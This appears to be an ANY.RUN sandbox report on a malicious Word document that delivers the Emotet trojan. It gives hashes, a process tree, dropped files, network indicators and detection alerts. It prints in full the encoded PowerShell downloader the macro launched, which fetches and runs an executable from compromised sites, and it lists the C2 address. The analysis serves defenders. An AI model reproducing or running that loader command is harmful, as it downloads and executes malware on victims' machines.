analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

eIK6rq3ZdKIUb6lY

Full analysis: https://app.any.run/tasks/579f7470-7159-44a2-bac7-c4a8905e39fc
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: September 30, 2020, 11:34:11
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
trojan
emotet
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Debitis., Author: Hugo Jean, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 30 07:24:00 2020, Last Saved Time/Date: Wed Sep 30 07:24:00 2020, Number of Pages: 1, Number of Words: 4190, Number of Characters: 23886, Security: 8
MD5:

94F634AC981E7CBB6482281EB9908849

SHA1:

046369266E26D34F712EDBC4C35A1967F9150340

SHA256:

5BF5490D9DAA5F884B6597377C8D3F4200A86F12A88C613B3B633681F3998191

SSDEEP:

1536:NNpHZTgQSz4w4K0vOYOcc2bqrQF2qWqhAZC:l1gQSU3K0hzqrQF2RqeZC

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • ipsecsnp.exe (PID: 1128)
      • Nyczl3x.exe (PID: 2728)

    • Downloads executable files from the Internet

      • POwersheLL.exe (PID: 1756)

    • EMOTET was detected

      • ipsecsnp.exe (PID: 1128)

    • Connects to CnC server

      • ipsecsnp.exe (PID: 1128)

    • Changes the autorun value in the registry

      • ipsecsnp.exe (PID: 1128)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • POwersheLL.exe (PID: 1756)
      • Nyczl3x.exe (PID: 2728)

    • Creates files in the user directory

      • POwersheLL.exe (PID: 1756)

    • Executed via WMI

      • POwersheLL.exe (PID: 1756)

    • PowerShell script executed

      • POwersheLL.exe (PID: 1756)

    • Starts itself from another location

      • Nyczl3x.exe (PID: 2728)

    • Reads Internet Cache Settings

      • ipsecsnp.exe (PID: 1128)

    • Executed via COM

      • DllHost.exe (PID: 2152)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3520)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3520)

    • Manual execution by user

      • explorer.exe (PID: 3640)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Debitis.
Subject: -
Author: Hugo Jean
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2020:09:30 06:24:00
ModifyDate: 2020:09:30 06:24:00
Pages: 1
Words: 4190
Characters: 23886
Security: Locked for annotations
Company: -
Lines: 199
Paragraphs: 56
CharCountWithSpaces: 28020
AppVersion: 15
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CodePage: Unicode UTF-16, little endian
LocaleIndicator: 1033
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
47
Monitored processes
6
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe nyczl3x.exe #EMOTET ipsecsnp.exe explorer.exe no specs Shell Security Editor no specs

Process information

PID
CMD
Path
Indicators
Parent process
3520"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\eIK6rq3ZdKIUb6lY.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1756POwersheLL -ENCOD JABUAHAAbABrAGMAcQA5AD0AKAAnAFQAJwArACgAJwA3AGIAJwArACcAMgBsADQAJwApACsAJwBuACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAEUATgB2ADoAdQBTAEUAcgBQAHIATwBmAEkAbABlAFwAdAAzAHQAVwBjADUAOABcAGMANAAxAEoAbQBjAFUAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABpAFIARQBDAFQATwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBjAHUAYABSAGkAYABUAHkAUABgAFIAbwB0AG8AYABjAE8ATAAiACAAPQAgACgAKAAnAHQAbABzADEAMgAnACsAJwAsACcAKQArACgAJwAgAHQAJwArACcAbABzADEAJwApACsAJwAxACcAKwAoACcALAAgAHQAJwArACcAbABzACcAKQApADsAJABHAHcAMgBjAGMAMQBwACAAPQAgACgAJwBOAHkAJwArACgAJwBjAHoAbAAnACsAJwAzACcAKQArACcAeAAnACkAOwAkAFgANQA3AGwAbQBhADkAPQAoACgAJwBCACcAKwAnAGIAbAAnACkAKwAoACcAeQAnACsAJwBwAGYAcwAnACkAKQA7ACQARgA0AHYAOQBlAGMAawA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAKAAnADEAJwArACcAdQBwAFQAMwAnACkAKwAoACcAdAB3AGMAJwArACcANQA4ACcAKQArACcAMQAnACsAKAAnAHUAcABDACcAKwAnADQAMQBqAG0AJwApACsAJwBjACcAKwAoACcAdQAnACsAJwAxAHUAJwApACsAJwBwACcAKQAgAC0AYwByAGUAcABMAEEAQwBFACgAWwBjAEgAQQBSAF0ANAA5ACsAWwBjAEgAQQBSAF0AMQAxADcAKwBbAGMASABBAFIAXQAxADEAMgApACwAWwBjAEgAQQBSAF0AOQAyACkAKwAkAEcAdwAyAGMAYwAxAHAAKwAoACcALgAnACsAKAAnAGUAeAAnACsAJwBlACcAKQApADsAJABWAGEANgBoADMAZgBxAD0AKAAoACcATABsACcAKwAnADEAJwApACsAJwB5ACcAKwAoACcAXwAnACsAJwA3AHAAJwApACkAOwAkAE8AZQBlAHQAZAB4AG8APQAmACgAJwBuACcAKwAnAGUAdwAtACcAKwAnAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAE4AZQB0AC4AVwBlAGIAQwBMAGkAZQBOAFQAOwAkAFAAYQBmAGsAbgBjADcAPQAoACgAJwBoAHQAdABwACcAKwAnADoALwAvACcAKQArACcAYwAnACsAKAAnAGEAYgAtAHcAaQBzAGUAJwArACcALgBjAG8AJwArACcAbQAvAHcAcAAtACcAKwAnAGEAZAAnACsAJwBtAGkAbgAvACcAKQArACgAJwBUAHkALwAnACsAJwAqAGgAdAAnACsAJwB0ACcAKQArACgAJwBwACcAKwAnADoALwAnACkAKwAoACcALwBlACcAKwAnAG0AcABsAG8AJwApACsAKAAnAHkAbQAnACsAJwBlAG4AdABwACcAKQArACgAJwBsAGEAJwArACcAYwBlACcAKQArACcAcwB0ACcAKwAoACcAYQBmAGYAaQAnACsAJwBuAGcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwApACsAKAAnAC0AaQBtAGEAJwArACcAZwAnACkAKwAoACcAZQAnACsAJwBzAC8AJwApACsAKAAnADYAVgA5ACcAKwAnAC8AKgBoAHQAJwArACcAdAAnACkAKwAnAHAAJwArACgAJwBzADoALwAvAGEAJwArACcAdgAnACkAKwAoACcAaQBkAGEAJwArACcAdgAnACkAKwAoACcAZQByAHIAYQAnACsAJwBzACcAKwAnAGUAJwApACsAJwB0ACcAKwAoACcAdAAnACsAJwBpAG4AJwApACsAKAAnAGcAJwArACcAcwAuAGMAJwApACsAKAAnAG8AbQAvACcAKwAnAHcAJwApACsAKAAnAHAAJwArACcALQBjACcAKQArACgAJwBvACcAKwAnAG4AdAAnACkAKwAoACcAZQAnACsAJwBuAHQAJwArACcALwBqAC8AJwArACcAKgBoAHQAJwApACsAKAAnAHQAcABzACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBkACcAKQArACgAJwBhACcAKwAnAGcAcgAnACkAKwAoACcAYQBuACcAKwAnAGkAJwApACsAJwB0AGUAJwArACcAZwAnACsAJwBpACcAKwAnAGEAcgAnACsAKAAnAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwB3ACcAKwAnAHAAJwApACsAJwAtACcAKwAoACcAYQAnACsAJwBkAG0AJwApACsAKAAnAGkAJwArACcAbgAvACcAKwAnAEUATAAvACoAaAB0ACcAKwAnAHQAcAAnACkAKwAnAHMAJwArACgAJwA6AC8ALwAnACsAJwBiACcAKQArACgAJwBiAGMAbAB1AGIAJwArACcAZQAnACkAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwB3AHAALQAnACsAJwBhAGQAbQBpAG4AJwApACsAJwAvACcAKwAoACcARgAnACsAJwBUAC8AJwApACsAJwAqACcAKwAnAGgAJwArACcAdAAnACsAKAAnAHQAcABzADoAJwArACcALwAnACkAKwAoACcALwBoACcAKwAnAGkAYQBuACcAKwAnAGMAbwBmAGYAJwApACsAKAAnAGUAZQBiAGkAawAnACsAJwBlAC4AJwArACcAYwBvACcAKQArACgAJwBtAC8ARgAvACoAJwArACcAaAAnACkAKwAnAHQAJwArACgAJwB0AHAAcwAnACsAJwA6AC8ALwAnACsAJwBrACcAKQArACgAJwBlAG4AaAAnACsAJwBuAG8AaQAnACkAKwAnAHQAaAAnACsAJwBhAHQAJwArACcAZwAnACsAJwBpAGEAJwArACcAcgBlACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAnAC8AcQAnACsAJwA3ACcAKwAnAC8AJwApAC4AIgBzAFAAYABMAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFUAOQBvAGkAdgB3AGcAPQAoACcAWQA3ACcAKwAnADEAagAnACsAKAAnAHIAMQAnACsAJwBfACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQARAAwAGkANQBxADUAbgAgAGkAbgAgACQAUABhAGYAawBuAGMANwApAHsAdAByAHkAewAkAE8AZQBlAHQAZAB4AG8ALgAiAGQATwBXAG4AYABMAG8AYQBkAEYAYABpAEwARQAiACgAJABEADAAaQA1AHEANQBuACwAIAAkAEYANAB2ADkAZQBjAGsAKQA7ACQARQA0ADYAawA4AHEAeAA9ACgAKAAnAEsAJwArACcAdgA3ACcAKQArACgAJwBiACcAKwAnAGwAagBnACcAKQApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAEYANAB2ADkAZQBjAGsAKQAuACIAbABFAG4ARwBgAFQAaAAiACAALQBnAGUAIAAyADMAMwAzADcAKQAgAHsALgAoACcASQBuAHYAbwAnACsAJwBrAGUALQBJACcAKwAnAHQAZQBtACcAKQAoACQARgA0AHYAOQBlAGMAawApADsAJABJADcAcgAzAGoAMQBoAD0AKAAnAEQAagAnACsAKAAnADcAcQBnADUAJwArACcAMQAnACkAKQA7AGIAcgBlAGEAawA7ACQASQBzAGgAYQBlAGQAbQA9ACgAJwBRACcAKwAoACcANQBhADEAZgBvACcAKwAnAHoAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE8AeABmADUAcwB4ADgAPQAoACgAJwBRAHIAJwArACcAMwAnACkAKwAnAGcAMgAnACsAJwBsAGkAJwApAA== C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2728"C:\Users\admin\T3twc58\C41jmcu\Nyczl3x.exe" C:\Users\admin\T3twc58\C41jmcu\Nyczl3x.exe
POwersheLL.exe
User:
admin
Company:
Intech Solutions
Integrity Level:
MEDIUM
Description:
MS masked edit control at the heart
Exit code:
0
Version:
2.27.0.5
1128"C:\Users\admin\AppData\Local\bitsadmin\ipsecsnp.exe"C:\Users\admin\AppData\Local\bitsadmin\ipsecsnp.exe
Nyczl3x.exe
User:
admin
Company:
Intech Solutions
Integrity Level:
MEDIUM
Description:
MS masked edit control at the heart
Version:
2.27.0.5
3640"C:\Windows\explorer.exe" C:\Windows\explorer.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2152C:\Windows\system32\DllHost.exe /Processid:{4D111E08-CBF7-4F12-A926-2C7920AF52FC}C:\Windows\system32\DllHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
COM Surrogate
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 390
Read events
1 501
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
3520WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRC10E.tmp.cvr
MD5:
SHA256:
1756POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OFWV80C54VOCXDKFY8A0.temp
MD5:
SHA256:
2728Nyczl3x.exeC:\Users\admin\AppData\Local\Temp\~DF45B3FAA909CBD6CC.TMP
MD5:
SHA256:
3520WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:B1B10889B94F907631EB8C8ED5A73030
SHA256:9BD27AEA31DF4567F4A74FD45D24064D6DBC757B401544CEA2EB724D6048B6CC
1756POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:4028388263805ABA00088A0BA4EEA515
SHA256:5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948
1756POwersheLL.exeC:\Users\admin\T3twc58\C41jmcu\Nyczl3x.exeexecutable
MD5:B11B83FB0C54101530BFD1506AC9B380
SHA256:7CF5B9B2F7D1E550C4E104D2FBE0E31A5E87BA853963479AB730E5B23A1D38FE
3520WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:E26A57F9FBE26903DAA5D6F66A2CAE79
SHA256:DED87B947D25F0387FFFA67DEEAF586CF7E6CAA3653147EDC24FFD2260F1E17B
1756POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3bcd24.TMPbinary
MD5:4028388263805ABA00088A0BA4EEA515
SHA256:5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948
2728Nyczl3x.exeC:\Users\admin\AppData\Local\bitsadmin\ipsecsnp.exeexecutable
MD5:B11B83FB0C54101530BFD1506AC9B380
SHA256:7CF5B9B2F7D1E550C4E104D2FBE0E31A5E87BA853963479AB730E5B23A1D38FE
3520WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$K6rq3ZdKIUb6lY.docpgc
MD5:C22495A60626EE5CBCC6EF889B48FFFE
SHA256:713247F9461C6915DD8C9983C0E1941B5F1A94BA1A899BE7EE841504BA8D52DC
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1756
POwersheLL.exe
GET
200
74.208.87.98:80
http://employmentplacestaffing.com/wp-images/6V9/
US
executable
332 Kb
suspicious
1128
ipsecsnp.exe
POST
200
202.22.141.45:80
http://202.22.141.45/UwbDPKRoVf4Z3mvEfnE/XZIK/
NC
binary
132 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1756
POwersheLL.exe
74.208.87.98:80
employmentplacestaffing.com
1&1 Internet SE
US
suspicious
202.22.141.45:80
OFFRATEL
NC
malicious

DNS requests

Domain
IP
Reputation
cab-wise.com
suspicious
employmentplacestaffing.com
  • 74.208.87.98
suspicious

Threats

PID
Process
Class
Message
1756
POwersheLL.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
1756
POwersheLL.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
1756
POwersheLL.exe
Misc activity
ET INFO EXE - Served Attached HTTP
1128
ipsecsnp.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M10
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
eIK6rq3ZdKIUb6lY